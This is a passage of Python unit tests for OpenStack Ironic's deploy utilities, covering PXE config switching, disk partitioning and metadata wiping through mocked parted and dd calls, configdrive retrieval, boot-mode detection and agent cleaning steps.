iqn)] + + self.assertRaises(TestException, utils.deploy_partition_image, + address, port, iqn, lun, image_path, + root_mb, swap_mb, ephemeral_mb, ephemeral_format, + node_uuid) + + self.assertEqual(calls_expected, parent_mock.mock_calls) + + +class SwitchPxeConfigTestCase(tests_base.TestCase): + + def _create_config(self, ipxe=False, boot_mode=None): + (fd, fname) = tempfile.mkstemp() + if boot_mode == 'uefi': + pxe_cfg = _UEFI_PXECONF_DEPLOY + else: + pxe_cfg = _IPXECONF_DEPLOY if ipxe else _PXECONF_DEPLOY + os.write(fd, pxe_cfg) + os.close(fd) + self.addCleanup(os.unlink, fname) + return fname + + def test_switch_pxe_config_partition_image(self): + boot_mode = 'bios' + fname = self._create_config() + utils.switch_pxe_config(fname, + '12345678-1234-1234-1234-1234567890abcdef', + boot_mode, + False) + with open(fname, 'r') as f: + pxeconf = f.read() + self.assertEqual(_PXECONF_BOOT_PARTITION, pxeconf) + + def test_switch_pxe_config_whole_disk_image(self): + boot_mode = 'bios' + fname = self._create_config() + utils.switch_pxe_config(fname, + '0x12345678', + boot_mode, + True) + with open(fname, 'r') as f: + pxeconf = f.read() + self.assertEqual(_PXECONF_BOOT_WHOLE_DISK, pxeconf) + + def test_switch_ipxe_config_partition_image(self): + boot_mode = 'bios' + cfg.CONF.set_override('ipxe_enabled', True, 'pxe') + fname = self._create_config(ipxe=True) + utils.switch_pxe_config(fname, + '12345678-1234-1234-1234-1234567890abcdef', + boot_mode, + False) + with open(fname, 'r') as f: + pxeconf = f.read() + self.assertEqual(_IPXECONF_BOOT_PARTITION, pxeconf) + + def test_switch_ipxe_config_whole_disk_image(self): + boot_mode = 'bios' + cfg.CONF.set_override('ipxe_enabled', True, 'pxe') + fname = self._create_config(ipxe=True) + utils.switch_pxe_config(fname, + '0x12345678', + boot_mode, + True) + with open(fname, 'r') as f: + pxeconf = f.read() + self.assertEqual(_IPXECONF_BOOT_WHOLE_DISK, pxeconf) + + def test_switch_uefi_pxe_config_partition_image(self): + boot_mode = 'uefi' + fname = self._create_config(boot_mode=boot_mode) + utils.switch_pxe_config(fname, + '12345678-1234-1234-1234-1234567890abcdef', + boot_mode, + 
False) + with open(fname, 'r') as f: + pxeconf = f.read() + self.assertEqual(_UEFI_PXECONF_BOOT_PARTITION, pxeconf) + + def test_switch_uefi_config_whole_disk_image(self): + boot_mode = 'uefi' + fname = self._create_config(boot_mode=boot_mode) + utils.switch_pxe_config(fname, + '0x12345678', + boot_mode, + True) + with open(fname, 'r') as f: + pxeconf = f.read() + self.assertEqual(_UEFI_PXECONF_BOOT_WHOLE_DISK, pxeconf) + + +@mock.patch('time.sleep', lambda sec: None) +class OtherFunctionTestCase(db_base.DbTestCase): + + def setUp(self): + super(OtherFunctionTestCase, self).setUp() + mgr_utils.mock_the_extension_manager(driver=""fake_pxe"") + self.node = obj_utils.create_test_node(self.context, driver='fake_pxe') + + def test_get_dev(self): + expected = '/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9' + actual = utils.get_dev('127.0.0.1', 5678, 'iqn.fake', 9) + self.assertEqual(expected, actual) + + @mock.patch.object(os, 'stat', autospec=True) + @mock.patch.object(stat, 'S_ISBLK', autospec=True) + def test_is_block_device_works(self, mock_is_blk, mock_os): + device = '/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9' + mock_is_blk.return_value = True + mock_os().st_mode = 10000 + self.assertTrue(utils.is_block_device(device)) + mock_is_blk.assert_called_once_with(mock_os().st_mode) + + @mock.patch.object(os, 'stat', autospec=True) + def test_is_block_device_raises(self, mock_os): + device = '/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9' + mock_os.side_effect = OSError + self.assertRaises(exception.InstanceDeployFailure, + utils.is_block_device, device) + mock_os.assert_has_calls([mock.call(device)] * 3) + + @mock.patch.object(os.path, 'getsize', autospec=True) + @mock.patch.object(images, 'converted_size', autospec=True) + def test_get_image_mb(self, mock_csize, mock_getsize): + mb = 1024 * 1024 + + mock_getsize.return_value = 0 + mock_csize.return_value = 0 + self.assertEqual(0, utils.get_image_mb('x', False)) + self.assertEqual(0, utils.get_image_mb('x', True)) + mock_getsize.return_value = 1 + mock_csize.return_value = 1 + self.assertEqual(1, utils.get_image_mb('x', False)) + self.assertEqual(1, utils.get_image_mb('x', True)) + mock_getsize.return_value = mb + mock_csize.return_value = mb + self.assertEqual(1, utils.get_image_mb('x', False)) + self.assertEqual(1, utils.get_image_mb('x', True)) + mock_getsize.return_value = mb + 1 + mock_csize.return_value = mb + 1 + self.assertEqual(2, utils.get_image_mb('x', False)) + self.assertEqual(2, utils.get_image_mb('x', True)) + + def test_parse_root_device_hints(self): + self.node.properties['root_device'] = {'wwn': 123456} + expected = 'wwn=123456' + result = utils.parse_root_device_hints(self.node) + self.assertEqual(expected, result) + + def test_parse_root_device_hints_string_space(self): + self.node.properties['root_device'] = {'model': 'fake model'} + expected = 'model=fake%20model' + result = utils.parse_root_device_hints(self.node) + self.assertEqual(expected, result) + + def test_parse_root_device_hints_no_hints(self): + self.node.properties = {} + result = utils.parse_root_device_hints(self.node) + self.assertIsNone(result) + + def test_parse_root_device_hints_invalid_hints(self): + self.node.properties['root_device'] = {'vehicle': 'Owlship'} + self.assertRaises(exception.InvalidParameterValue, + utils.parse_root_device_hints, self.node) + + def test_parse_root_device_hints_invalid_size(self): + self.node.properties['root_device'] = {'size': 'not-int'} + 
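+ # the 'size' hint must be an integer, so a string value is rejected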
self.assertRaises(exception.InvalidParameterValue, + utils.parse_root_device_hints, self.node) + + +@mock.patch.object(disk_partitioner.DiskPartitioner, 'commit', lambda _: None) +class WorkOnDiskTestCase(tests_base.TestCase): + + def setUp(self): + super(WorkOnDiskTestCase, self).setUp() + self.image_path = '/tmp/xyz/image' + self.root_mb = 128 + self.swap_mb = 64 + self.ephemeral_mb = 0 + self.ephemeral_format = None + self.configdrive_mb = 0 + self.dev = '/dev/fake' + self.swap_part = '/dev/fake-part1' + self.root_part = '/dev/fake-part2' + + self.mock_ibd_obj = mock.patch.object( + utils, 'is_block_device', autospec=True) + self.mock_ibd = self.mock_ibd_obj.start() + self.addCleanup(self.mock_ibd_obj.stop) + self.mock_mp_obj = mock.patch.object( + utils, 'make_partitions', autospec=True) + self.mock_mp = self.mock_mp_obj.start() + self.addCleanup(self.mock_mp_obj.stop) + self.mock_remlbl_obj = mock.patch.object( + utils, 'destroy_disk_metadata', autospec=True) + self.mock_remlbl = self.mock_remlbl_obj.start() + self.addCleanup(self.mock_remlbl_obj.stop) + self.mock_mp.return_value = {'swap': self.swap_part, + 'root': self.root_part} + + def test_no_root_partition(self): + self.mock_ibd.return_value = False + self.assertRaises(exception.InstanceDeployFailure, + utils.work_on_disk, self.dev, self.root_mb, + self.swap_mb, self.ephemeral_mb, + self.ephemeral_format, self.image_path, 'fake-uuid') + self.mock_ibd.assert_called_once_with(self.root_part) + self.mock_mp.assert_called_once_with(self.dev, self.root_mb, + self.swap_mb, self.ephemeral_mb, + self.configdrive_mb, commit=True, + boot_option=""netboot"", + boot_mode=""bios"") + + def test_no_swap_partition(self): + self.mock_ibd.side_effect = iter([True, False]) + calls = [mock.call(self.root_part), + mock.call(self.swap_part)] + self.assertRaises(exception.InstanceDeployFailure, + utils.work_on_disk, self.dev, self.root_mb, + self.swap_mb, self.ephemeral_mb, + self.ephemeral_format, self.image_path, 'fake-uuid') + self.assertEqual(self.mock_ibd.call_args_list, calls) + self.mock_mp.assert_called_once_with(self.dev, self.root_mb, + self.swap_mb, self.ephemeral_mb, + self.configdrive_mb, commit=True, + boot_option=""netboot"", + boot_mode=""bios"") + + def test_no_ephemeral_partition(self): + ephemeral_part = '/dev/fake-part1' + swap_part = '/dev/fake-part2' + root_part = '/dev/fake-part3' + ephemeral_mb = 256 + ephemeral_format = 'exttest' + + self.mock_mp.return_value = {'ephemeral': ephemeral_part, + 'swap': swap_part, + 'root': root_part} + self.mock_ibd.side_effect = iter([True, True, False]) + calls = [mock.call(root_part), + mock.call(swap_part), + mock.call(ephemeral_part)] + self.assertRaises(exception.InstanceDeployFailure, + utils.work_on_disk, self.dev, self.root_mb, + self.swap_mb, ephemeral_mb, ephemeral_format, + self.image_path, 'fake-uuid') + self.assertEqual(self.mock_ibd.call_args_list, calls) + self.mock_mp.assert_called_once_with(self.dev, self.root_mb, + self.swap_mb, ephemeral_mb, + self.configdrive_mb, commit=True, + boot_option=""netboot"", + boot_mode=""bios"") + + @mock.patch.object(common_utils, 'unlink_without_raise', autospec=True) + @mock.patch.object(utils, '_get_configdrive', autospec=True) + def test_no_configdrive_partition(self, mock_configdrive, mock_unlink): + mock_configdrive.return_value = (10, 'fake-path') + swap_part = '/dev/fake-part1' + configdrive_part = '/dev/fake-part2' + root_part = '/dev/fake-part3' + configdrive_url = 'http://127.0.0.1/cd' + configdrive_mb = 10 + + 
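# _get_configdrive is mocked to report a 10 MB config drive staged + # at 'fake-path'; after the deploy fails, that temporary file must + # be cleaned up via unlink_without_raise (asserted below). +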
self.mock_mp.return_value = {'swap': swap_part, + 'configdrive': configdrive_part, + 'root': root_part} + self.mock_ibd.side_effect = iter([True, True, False]) + calls = [mock.call(root_part), + mock.call(swap_part), + mock.call(configdrive_part)] + self.assertRaises(exception.InstanceDeployFailure, + utils.work_on_disk, self.dev, self.root_mb, + self.swap_mb, self.ephemeral_mb, + self.ephemeral_format, self.image_path, 'fake-uuid', + preserve_ephemeral=False, + configdrive=configdrive_url, + boot_option=""netboot"") + self.assertEqual(self.mock_ibd.call_args_list, calls) + self.mock_mp.assert_called_once_with(self.dev, self.root_mb, + self.swap_mb, self.ephemeral_mb, + configdrive_mb, commit=True, + boot_option=""netboot"", + boot_mode=""bios"") + mock_unlink.assert_called_once_with('fake-path') + + +@mock.patch.object(common_utils, 'execute', autospec=True) +class MakePartitionsTestCase(tests_base.TestCase): + + def setUp(self): + super(MakePartitionsTestCase, self).setUp() + self.dev = 'fake-dev' + self.root_mb = 1024 + self.swap_mb = 512 + self.ephemeral_mb = 0 + self.configdrive_mb = 0 + self.parted_static_cmd = ['parted', '-a', 'optimal', '-s', self.dev, + '--', 'unit', 'MiB', 'mklabel', 'msdos'] + + def _test_make_partitions(self, mock_exc, boot_option): + mock_exc.return_value = (None, None) + utils.make_partitions(self.dev, self.root_mb, self.swap_mb, + self.ephemeral_mb, self.configdrive_mb, + boot_option=boot_option) + + expected_mkpart = ['mkpart', 'primary', 'linux-swap', '1', '513', + 'mkpart', 'primary', '', '513', '1537'] + if boot_option == ""local"": + expected_mkpart.extend(['set', '2', 'boot', 'on']) + parted_cmd = self.parted_static_cmd + expected_mkpart + parted_call = mock.call(*parted_cmd, run_as_root=True, + check_exit_code=[0]) + fuser_cmd = ['fuser', 'fake-dev'] + fuser_call = mock.call(*fuser_cmd, run_as_root=True, + check_exit_code=[0, 1]) + mock_exc.assert_has_calls([parted_call, fuser_call]) + + def test_make_partitions(self, mock_exc): + self._test_make_partitions(mock_exc, boot_option=""netboot"") + + def test_make_partitions_local_boot(self, mock_exc): + self._test_make_partitions(mock_exc, boot_option=""local"") + + def test_make_partitions_with_ephemeral(self, mock_exc): + self.ephemeral_mb = 2048 + expected_mkpart = ['mkpart', 'primary', '', '1', '2049', + 'mkpart', 'primary', 'linux-swap', '2049', '2561', + 'mkpart', 'primary', '', '2561', '3585'] + cmd = self.parted_static_cmd + expected_mkpart + mock_exc.return_value = (None, None) + utils.make_partitions(self.dev, self.root_mb, self.swap_mb, + self.ephemeral_mb, self.configdrive_mb) + + parted_call = mock.call(*cmd, run_as_root=True, check_exit_code=[0]) + mock_exc.assert_has_calls([parted_call]) + + +@mock.patch.object(utils, 'get_dev_block_size', autospec=True) +@mock.patch.object(common_utils, 'execute', autospec=True) +class DestroyMetaDataTestCase(tests_base.TestCase): + + def setUp(self): + super(DestroyMetaDataTestCase, self).setUp() + self.dev = 'fake-dev' + self.node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + def test_destroy_disk_metadata(self, mock_exec, mock_gz): + mock_gz.return_value = 64 + expected_calls = [mock.call('dd', 'if=/dev/zero', 'of=fake-dev', + 'bs=512', 'count=36', run_as_root=True, + check_exit_code=[0]), + mock.call('dd', 'if=/dev/zero', 'of=fake-dev', + 'bs=512', 'count=36', 'seek=28', + run_as_root=True, + check_exit_code=[0])] + utils.destroy_disk_metadata(self.dev, self.node_uuid) + mock_exec.assert_has_calls(expected_calls) + 
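# blockdev reported 64 sectors, so the second dd call (seek=28, + # count=36) zeroes the last 36 sectors of the device, i.e. the + # region where a backup GPT would live (28 + 36 == 64). +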
self.assertTrue(mock_gz.called) + + def test_destroy_disk_metadata_get_dev_size_fail(self, mock_exec, mock_gz): + mock_gz.side_effect = processutils.ProcessExecutionError + + expected_call = [mock.call('dd', 'if=/dev/zero', 'of=fake-dev', + 'bs=512', 'count=36', run_as_root=True, + check_exit_code=[0])] + self.assertRaises(processutils.ProcessExecutionError, + utils.destroy_disk_metadata, + self.dev, + self.node_uuid) + mock_exec.assert_has_calls(expected_call) + + def test_destroy_disk_metadata_dd_fail(self, mock_exec, mock_gz): + mock_exec.side_effect = processutils.ProcessExecutionError + + expected_call = [mock.call('dd', 'if=/dev/zero', 'of=fake-dev', + 'bs=512', 'count=36', run_as_root=True, + check_exit_code=[0])] + self.assertRaises(processutils.ProcessExecutionError, + utils.destroy_disk_metadata, + self.dev, + self.node_uuid) + mock_exec.assert_has_calls(expected_call) + self.assertFalse(mock_gz.called) + + +@mock.patch.object(common_utils, 'execute', autospec=True) +class GetDeviceBlockSizeTestCase(tests_base.TestCase): + + def setUp(self): + super(GetDeviceBlockSizeTestCase, self).setUp() + self.dev = 'fake-dev' + self.node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + def test_get_dev_block_size(self, mock_exec): + mock_exec.return_value = (""64"", """") + expected_call = [mock.call('blockdev', '--getsz', self.dev, + run_as_root=True, check_exit_code=[0])] + utils.get_dev_block_size(self.dev) + mock_exec.assert_has_calls(expected_call) + + +@mock.patch.object(utils, 'dd', autospec=True) +@mock.patch.object(images, 'qemu_img_info', autospec=True) +@mock.patch.object(images, 'convert_image', autospec=True) +class PopulateImageTestCase(tests_base.TestCase): + + def setUp(self): + super(PopulateImageTestCase, self).setUp() + + def test_populate_raw_image(self, mock_cg, mock_qinfo, mock_dd): + type(mock_qinfo.return_value).file_format = mock.PropertyMock( + return_value='raw') + utils.populate_image('src', 'dst') + mock_dd.assert_called_once_with('src', 'dst') + self.assertFalse(mock_cg.called) + + def test_populate_qcow2_image(self, mock_cg, mock_qinfo, mock_dd): + type(mock_qinfo.return_value).file_format = mock.PropertyMock( + return_value='qcow2') + utils.populate_image('src', 'dst') + mock_cg.assert_called_once_with('src', 'dst', 'raw', True) + self.assertFalse(mock_dd.called) + + +@mock.patch.object(utils, 'is_block_device', lambda d: True) +@mock.patch.object(utils, 'block_uuid', lambda p: 'uuid') +@mock.patch.object(utils, 'dd', lambda *_: None) +@mock.patch.object(images, 'convert_image', lambda *_: None) +@mock.patch.object(common_utils, 'mkfs', lambda *_: None) +# NOTE(dtantsur): destroy_disk_metadata resets file size, disabling it +@mock.patch.object(utils, 'destroy_disk_metadata', lambda *_: None) +class RealFilePartitioningTestCase(tests_base.TestCase): + """"""This test applies some real-world partitioning scenario to a file. + + This test covers the whole partitioning, mocking everything not possible + on a file. That helps us ensure that we do all partitioning math properly, + and it also conducts integration testing of DiskPartitioner.
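+ (setUp creates a sparse 20 MiB file to stand in for a real block + device, and _run_without_root wraps execute() so the tests do not + need root privileges.)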
+ """""" + + def setUp(self): + super(RealFilePartitioningTestCase, self).setUp() + # NOTE(dtantsur): no parted utility on gate-ironic-python26 + try: + common_utils.execute('parted', '--version') + except OSError as exc: + self.skipTest('parted utility was not found: %s' % exc) + self.file = tempfile.NamedTemporaryFile(delete=False) + # NOTE(ifarkas): the file needs to be closed, so fuser won't report + # any usage + self.file.close() + # NOTE(dtantsur): 20 MiB file with zeros + common_utils.execute('dd', 'if=/dev/zero', 'of=%s' % self.file.name, + 'bs=1', 'count=0', 'seek=20MiB') + + @staticmethod + def _run_without_root(func, *args, **kwargs): + """"""Make sure root is not required when using utils.execute."""""" + real_execute = common_utils.execute + + def fake_execute(*cmd, **kwargs): + kwargs['run_as_root'] = False + return real_execute(*cmd, **kwargs) + + with mock.patch.object(common_utils, 'execute', fake_execute): + return func(*args, **kwargs) + + def test_different_sizes(self): + # NOTE(dtantsur): Keep this list in order with expected partitioning + fields = ['ephemeral_mb', 'swap_mb', 'root_mb'] + variants = ((0, 0, 12), (4, 2, 8), (0, 4, 10), (5, 0, 10)) + for variant in variants: + kwargs = dict(zip(fields, variant)) + self._run_without_root(utils.work_on_disk, self.file.name, + ephemeral_format='ext4', node_uuid='', + image_path='path', **kwargs) + part_table = self._run_without_root( + disk_partitioner.list_partitions, self.file.name) + for part, expected_size in zip(part_table, filter(None, variant)): + self.assertEqual(expected_size, part['size'], + ""comparison failed for %s"" % list(variant)) + + def test_whole_disk(self): + # 6 MiB ephemeral + 3 MiB swap + 9 MiB root + 1 MiB for MBR + # + 1 MiB MAGIC == 20 MiB whole disk + # TODO(dtantsur): figure out why we need 'magic' 1 more MiB + # and why the size is different on Ubuntu and Fedora (see below) + self._run_without_root(utils.work_on_disk, self.file.name, + root_mb=9, ephemeral_mb=6, swap_mb=3, + ephemeral_format='ext4', node_uuid='', + image_path='path') + part_table = self._run_without_root( + disk_partitioner.list_partitions, self.file.name) + sizes = [part['size'] for part in part_table] + # NOTE(dtantsur): parted in Ubuntu 12.04 will occupy the last MiB, + # parted in Fedora 20 won't - thus two possible variants for last part + self.assertEqual([6, 3], sizes[:2], + ""unexpected partitioning %s"" % part_table) + self.assertIn(sizes[2], (9, 10)) + + @mock.patch.object(image_cache, 'clean_up_caches', autospec=True) + def test_fetch_images(self, mock_clean_up_caches): + + mock_cache = mock.MagicMock( + spec_set=['fetch_image', 'master_dir'], master_dir='master_dir') + utils.fetch_images(None, mock_cache, [('uuid', 'path')]) + mock_clean_up_caches.assert_called_once_with(None, 'master_dir', + [('uuid', 'path')]) + mock_cache.fetch_image.assert_called_once_with('uuid', 'path', + ctx=None, + force_raw=True) + + @mock.patch.object(image_cache, 'clean_up_caches', autospec=True) + def test_fetch_images_fail(self, mock_clean_up_caches): + + exc = exception.InsufficientDiskSpace(path='a', + required=2, + actual=1) + + mock_cache = mock.MagicMock( + spec_set=['master_dir'], master_dir='master_dir') + mock_clean_up_caches.side_effect = iter([exc]) + self.assertRaises(exception.InstanceDeployFailure, + utils.fetch_images, + None, + mock_cache, + [('uuid', 'path')]) + mock_clean_up_caches.assert_called_once_with(None, 'master_dir', + [('uuid', 'path')]) + + +@mock.patch.object(shutil, 'copyfileobj', autospec=True)
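+# NOTE: _get_configdrive accepts either an HTTP URL or a base64-encoded +# gzipped payload; the tests below exercise both forms and the error paths.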
+@mock.patch.object(requests, 'get', autospec=True) +class GetConfigdriveTestCase(tests_base.TestCase): + + @mock.patch.object(gzip, 'GzipFile', autospec=True) + def test_get_configdrive(self, mock_gzip, mock_requests, mock_copy): + mock_requests.return_value = mock.MagicMock( + spec_set=['content'], content='Zm9vYmFy') + utils._get_configdrive('http://127.0.0.1/cd', 'fake-node-uuid') + mock_requests.assert_called_once_with('http://127.0.0.1/cd') + mock_gzip.assert_called_once_with('configdrive', 'rb', + fileobj=mock.ANY) + mock_copy.assert_called_once_with(mock.ANY, mock.ANY) + + @mock.patch.object(gzip, 'GzipFile', autospec=True) + def test_get_configdrive_base64_string(self, mock_gzip, mock_requests, + mock_copy): + utils._get_configdrive('Zm9vYmFy', 'fake-node-uuid') + self.assertFalse(mock_requests.called) + mock_gzip.assert_called_once_with('configdrive', 'rb', + fileobj=mock.ANY) + mock_copy.assert_called_once_with(mock.ANY, mock.ANY) + + def test_get_configdrive_bad_url(self, mock_requests, mock_copy): + mock_requests.side_effect = requests.exceptions.RequestException + self.assertRaises(exception.InstanceDeployFailure, + utils._get_configdrive, 'http://127.0.0.1/cd', + 'fake-node-uuid') + self.assertFalse(mock_copy.called) + + @mock.patch.object(base64, 'b64decode', autospec=True) + def test_get_configdrive_base64_error(self, mock_b64, mock_requests, + mock_copy): + mock_b64.side_effect = TypeError + self.assertRaises(exception.InstanceDeployFailure, + utils._get_configdrive, + 'malformed', 'fake-node-uuid') + mock_b64.assert_called_once_with('malformed') + self.assertFalse(mock_copy.called) + + @mock.patch.object(gzip, 'GzipFile', autospec=True) + def test_get_configdrive_gzip_error(self, mock_gzip, mock_requests, + mock_copy): + mock_requests.return_value = mock.MagicMock( + spec_set=['content'], content='Zm9vYmFy') + mock_copy.side_effect = IOError + self.assertRaises(exception.InstanceDeployFailure, + utils._get_configdrive, 'http://127.0.0.1/cd', + 'fake-node-uuid') + mock_requests.assert_called_once_with('http://127.0.0.1/cd') + mock_gzip.assert_called_once_with('configdrive', 'rb', + fileobj=mock.ANY) + mock_copy.assert_called_once_with(mock.ANY, mock.ANY) + + +class VirtualMediaDeployUtilsTestCase(db_base.DbTestCase): + + def setUp(self): + super(VirtualMediaDeployUtilsTestCase, self).setUp() + mgr_utils.mock_the_extension_manager(driver=""iscsi_ilo"") + info_dict = db_utils.get_test_ilo_info() + self.node = obj_utils.create_test_node(self.context, + driver='iscsi_ilo', driver_info=info_dict) + + def test_get_single_nic_with_vif_port_id(self): + obj_utils.create_test_port(self.context, node_id=self.node.id, + address='aa:bb:cc', uuid=uuidutils.generate_uuid(), + extra={'vif_port_id': 'test-vif-A'}, driver='iscsi_ilo') + with task_manager.acquire(self.context, self.node.uuid, + shared=False) as task: + address = utils.get_single_nic_with_vif_port_id(task) + self.assertEqual('aa:bb:cc', address) + + +class ParseInstanceInfoCapabilitiesTestCase(tests_base.TestCase): + + def setUp(self): + super(ParseInstanceInfoCapabilitiesTestCase, self).setUp() + self.node = obj_utils.get_test_node(self.context, driver='fake') + + def test_parse_instance_info_capabilities_string(self): + self.node.instance_info = {'capabilities': '{""cat"": ""meow""}'} + expected_result = {""cat"": ""meow""} + result = utils.parse_instance_info_capabilities(self.node) + self.assertEqual(expected_result, result) + + def test_parse_instance_info_capabilities(self): + self.node.instance_info = {'capabilities': 
{""dog"": ""wuff""}} + expected_result = {""dog"": ""wuff""} + result = utils.parse_instance_info_capabilities(self.node) + self.assertEqual(expected_result, result) + + def test_parse_instance_info_invalid_type(self): + self.node.instance_info = {'capabilities': 'not-a-dict'} + self.assertRaises(exception.InvalidParameterValue, + utils.parse_instance_info_capabilities, self.node) + + def test_is_secure_boot_requested_true(self): + self.node.instance_info = {'capabilities': {""secure_boot"": ""tRue""}} + self.assertTrue(utils.is_secure_boot_requested(self.node)) + + def test_is_secure_boot_requested_false(self): + self.node.instance_info = {'capabilities': {""secure_boot"": ""false""}} + self.assertFalse(utils.is_secure_boot_requested(self.node)) + + def test_is_secure_boot_requested_invalid(self): + self.node.instance_info = {'capabilities': {""secure_boot"": ""invalid""}} + self.assertFalse(utils.is_secure_boot_requested(self.node)) + + def test_get_boot_mode_for_deploy_using_capabilities(self): + properties = {'capabilities': 'boot_mode:uefi,cap2:value2'} + self.node.properties = properties + + result = utils.get_boot_mode_for_deploy(self.node) + self.assertEqual('uefi', result) + + def test_get_boot_mode_for_deploy_using_instance_info_cap(self): + instance_info = {'capabilities': {'secure_boot': 'True'}} + self.node.instance_info = instance_info + + result = utils.get_boot_mode_for_deploy(self.node) + self.assertEqual('uefi', result) + + def test_get_boot_mode_for_deploy_using_instance_info(self): + instance_info = {'deploy_boot_mode': 'bios'} + self.node.instance_info = instance_info + + result = utils.get_boot_mode_for_deploy(self.node) + self.assertEqual('bios', result) + + +class TrySetBootDeviceTestCase(db_base.DbTestCase): + + def setUp(self): + super(TrySetBootDeviceTestCase, self).setUp() + mgr_utils.mock_the_extension_manager(driver=""fake"") + self.node = obj_utils.create_test_node(self.context, driver=""fake"") + + @mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True) + def test_try_set_boot_device_okay(self, node_set_boot_device_mock): + with task_manager.acquire(self.context, self.node.uuid, + shared=False) as task: + utils.try_set_boot_device(task, boot_devices.DISK, + persistent=True) + node_set_boot_device_mock.assert_called_once_with( + task, boot_devices.DISK, persistent=True) + + @mock.patch.object(utils, 'LOG', autospec=True) + @mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True) + def test_try_set_boot_device_ipmifailure_uefi(self, + node_set_boot_device_mock, log_mock): + self.node.properties = {'capabilities': 'boot_mode:uefi'} + self.node.save() + node_set_boot_device_mock.side_effect = exception.IPMIFailure(cmd='a') + with task_manager.acquire(self.context, self.node.uuid, + shared=False) as task: + utils.try_set_boot_device(task, boot_devices.DISK, + persistent=True) + node_set_boot_device_mock.assert_called_once_with( + task, boot_devices.DISK, persistent=True) + log_mock.warning.assert_called_once_with(mock.ANY) + + @mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True) + def test_try_set_boot_device_ipmifailure_bios( + self, node_set_boot_device_mock): + node_set_boot_device_mock.side_effect = exception.IPMIFailure(cmd='a') + with task_manager.acquire(self.context, self.node.uuid, + shared=False) as task: + self.assertRaises(exception.IPMIFailure, + utils.try_set_boot_device, + task, boot_devices.DISK, persistent=True) + node_set_boot_device_mock.assert_called_once_with( + task, boot_devices.DISK, 
persistent=True) + + @mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True) + def test_try_set_boot_device_some_other_exception( + self, node_set_boot_device_mock): + exc = exception.IloOperationError(operation=""qwe"", error=""error"") + node_set_boot_device_mock.side_effect = exc + with task_manager.acquire(self.context, self.node.uuid, + shared=False) as task: + self.assertRaises(exception.IloOperationError, + utils.try_set_boot_device, + task, boot_devices.DISK, persistent=True) + node_set_boot_device_mock.assert_called_once_with( + task, boot_devices.DISK, persistent=True) + + +class AgentCleaningTestCase(db_base.DbTestCase): + def setUp(self): + super(AgentCleaningTestCase, self).setUp() + mgr_utils.mock_the_extension_manager(driver='fake_agent') + n = {'driver': 'fake_agent', + 'driver_internal_info': {'agent_url': 'http://127.0.0.1:9999'}} + + self.node = obj_utils.create_test_node(self.context, **n) + self.ports = [obj_utils.create_test_port(self.context, + node_id=self.node.id)] + + self.clean_steps = { + 'hardware_manager_version': '1', + 'clean_steps': { + 'GenericHardwareManager': [ + {'interface': 'deploy', + 'step': 'erase_devices', + 'priority': 20}, + ], + 'SpecificHardwareManager': [ + {'interface': 'deploy', + 'step': 'update_firmware', + 'priority': 30}, + {'interface': 'raid', + 'step': 'create_raid', + 'priority': 10}, + ] + } + } + + @mock.patch('ironic.objects.Port.list_by_node_id', + spec_set=types.FunctionType) + @mock.patch.object(agent_client.AgentClient, 'get_clean_steps', + autospec=True) + def test_get_clean_steps(self, client_mock, list_ports_mock): + client_mock.return_value = { + 'command_result': self.clean_steps} + list_ports_mock.return_value = self.ports + + with task_manager.acquire( + self.context, self.node['uuid'], shared=False) as task: + response = utils.agent_get_clean_steps(task) + client_mock.assert_called_once_with(mock.ANY, task.node, + self.ports) + self.assertEqual('1', task.node.driver_internal_info[ + 'hardware_manager_version']) + + # Since steps are returned in dicts, they have non-deterministic + # ordering + self.assertEqual(2, len(response)) + self.assertIn(self.clean_steps['clean_steps'][ + 'GenericHardwareManager'][0], response) + self.assertIn(self.clean_steps['clean_steps'][ + 'SpecificHardwareManager'][0], response) + + @mock.patch('ironic.objects.Port.list_by_node_id', + spec_set=types.FunctionType) + @mock.patch.object(agent_client.AgentClient, 'get_clean_steps', + autospec=True) + def test_get_clean_steps_missing_steps(self, client_mock, + list_ports_mock): + del self.clean_steps['clean_steps'] + client_mock.return_value = { + 'command_result': self.clean_steps} + list_ports_mock.return_value = self.ports + + with task_manager.acquire( + self.context, self.node['uuid'], shared=False) as task: + self.assertRaises(exception.NodeCleaningFailure, + utils.agent_get_clean_steps, + task) + client_mock.assert_called_once_with(mock.ANY, task.node, + self.ports) + + @mock.patch('ironic.objects.Port.list_by_node_id', + spec_set=types.FunctionType) + @mock.patch.object(agent_client.AgentClient, 'execute_clean_step', + autospec=True) + def test_execute_clean_step(self, client_mock, list_ports_mock): + client_mock.return_value = { + 'command_status': 'SUCCEEDED'} + list_ports_mock.return_value = self.ports + + with task_manager.acquire( + self.context, self.node['uuid'], shared=False) as task: + response = utils.agent_execute_clean_step( + task, + self.clean_steps['clean_steps']['GenericHardwareManager'][0]) + 
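# The agent reported SUCCEEDED, yet the helper still returns + # states.CLEANING for the node. +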
self.assertEqual(states.CLEANING, response) + + @mock.patch('ironic.objects.Port.list_by_node_id', + spec_set=types.FunctionType) + @mock.patch.object(agent_client.AgentClient, 'execute_clean_step', + autospec=True) + def test_execute_clean_step_running(self, client_mock, list_ports_mock): + client_mock.return_value = { + 'command_status': 'RUNNING'} + list_ports_mock.return_value = self.ports + + with task_manager.acquire( + self.context, self.node['uuid'], shared=False) as task: + response = utils.agent_execute_clean_step( + task, + self.clean_steps['clean_steps']['GenericHardwareManager'][0]) + self.assertEqual(states.CLEANING, response) + + @mock.patch('ironic.objects.Port.list_by_node_id', + spec_set=types.FunctionType) + @mock.patch.object(agent_client.AgentClient, 'execute_clean_step', + autospec=True) + def test_execute_clean_step_version_mismatch(self, client_mock, + list_ports_mock): + client_mock.return_value = { + 'command_status': 'RUNNING'} + list_ports_mock.return_value = self.ports + + with task_manager.acquire( + self.context, self.node['uuid'], shared=False) as task: + response = utils.agent_execute_clean_step( + task, + self.clean_steps['clean_steps']['GenericHardwareManager'][0]) + self.assertEqual(states.CLEANING, response) + + +@mock.patch.object(utils, 'is_block_device', autospec=True) +@mock.patch.object(utils, 'login_iscsi', lambda *_: None) +@mock.patch.object(utils, 'discovery', lambda *_: None) +@mock.patch.object(utils, 'logout_iscsi', lambda *_: None) 